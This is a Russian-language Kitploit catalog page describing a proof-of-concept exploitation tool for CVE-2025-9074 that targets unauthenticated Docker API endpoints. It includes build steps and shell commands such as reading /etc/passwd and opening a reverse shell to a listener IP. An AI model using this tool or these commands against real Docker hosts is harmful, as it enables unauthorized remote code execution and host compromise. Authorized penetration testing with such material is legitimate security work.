Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
Инструменты/GitHubGitHub/xwpdx0/poc-2025-9074
Безопасность облачной инфраструктурыПовышение привилегийСканеры уязвимостейБезопасность контейнеровФреймворки для эксплойтовЭксплуатацияПост-эксплуатацияТестирование на ПроникновениеКомандование и УправлениеИнструмент Удаленного Доступа
GitHub
4119 месяцев назадЕщё не проверено
xwpdx0/poc-2025-9074

poc-2025-9074

Docker API CVE-2025-9074 PoC (Proof-Of-Concept). Продвинутый фреймворк для эксплуатации CVE-2025-9074, нацеленный на неаутентифицированные конечные точки Docker API и оснащённый встроенной интерактивной командной оболочкой.

Репозиторий

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2025-9074 | Docker API CVE-2025-9074 PoC (Proof-Of-Concept)

Многофункциональный фреймворк для эксплуатации CVE-2025-9074, нацеленный на неаутентифицированные Docker API-эндпоинты со встроенной интерактивной командной оболочкой.

Language Platform License

Обзор

Этот инструмент автоматизирует эксплуатацию незащищённых Docker API-инстансов без аутентификации, позволяя полностью создавать контейнеры и выполнять команды на целевом хосте. Инструмент оснащён собственной интерактивной оболочкой для удобной пост-эксплуатации.

Примечание: Это собственная реализация PoC. Я не обнаруживал CVE-2025-9074.

Демонстрация

Первичная эксплуатация

Процесс эксплуатации

Автоматическое обнаружение уязвимости, загрузка образов, создание и инициализация контейнера

Интерактивное выполнение команд

Выполнение команд

Пост-эксплуатационная оболочка с возможностью выполнения команд

Ключевые возможности

  • Автоматическое сканирование уязвимостей Docker API
  • Развёртывание контейнеров с монтированием файловой системы хоста
  • Интерактивная пост-эксплуатационная оболочка
  • Интерфейс удалённого выполнения команд
  • Модуль развёртывания reverse shell
  • Цветной вывод в терминале для лучшей наглядности

Установка

  1. Клонируйте репозиторий
root@kitploit:~
git clone https://github.com/xwpdx0/poc-2025-9074
  1. Скомпилируйте код
root@kitploit:~
gcc poc.c -o poc-2025-9074

или вы можете скачать бинарный файл со страницы Релизы

Использование

root@kitploit:~
./poc-2025-9074

Цель по умолчанию

Запуск против цели по умолчанию (127.0.0.1:2375):

root@kitploit:~
./poc-2025-9074

Своя цель

Укажите собственный Docker API-эндпоинт:

Своя цель

Интерактивная оболочка

После успешной эксплуатации интерактивная оболочка предоставляет следующие команды:

КомандаОписание
cmd <command>Выполнение произвольных команд внутри контейнера
revshell <ip> <port>Развёртывание reverse shell на указанный слушатель
infoОтображение информации о текущем контейнере и цели
exitЗавершение интерактивной сессии

Примеры использования

root@kitploit:~
(PoC-CVE-2025-9074)> cmd whoami
(PoC-CVE-2025-9074)> cmd cat /etc/passwd
(PoC-CVE-2025-9074)> cmd ls -la /mnt
(PoC-CVE-2025-9074)> revshell 10.10.14.5 9001
(PoC-CVE-2025-9074)> info

Сведения об уязвимости

CVE-2025-9074 затрагивает Docker-инстансы с открытыми API-эндпоинтами, у которых отсутствуют надлежащие механизмы аутентификации. Эта ошибка конфигурации предоставляет неавторизованный доступ к демону Docker и позволяет:

  • Создавать произвольные контейнеры
  • Получать доступ к файловой системе хоста через bind-mount
  • Расширять привилегии
  • Выполнять удалённый код

Правовое предупреждение

Данный инструмент предоставляется только для образовательных целей и авторизованного тестирования безопасности.

  • Используйте его только на системах, которыми вы владеете, или при наличии явного письменного разрешения на тестирование
  • Несанкционированный доступ к компьютерным системам незаконен и преследуется по закону
  • Автор не несёт ответственности за неправомерное использование или ущерб, причинённый данным инструментом
  • Пользователи несут единоличную ответственность за соблюдение применимых законов и нормативных требований

Автор

xwpd (@xwpdx0)

Лицензия

Лицензия MIT — подробности см. в файле LICENSE


Только для ответственного раскрытия уязвимостей и исследовательских целей в области безопасности.

Скачать инструмент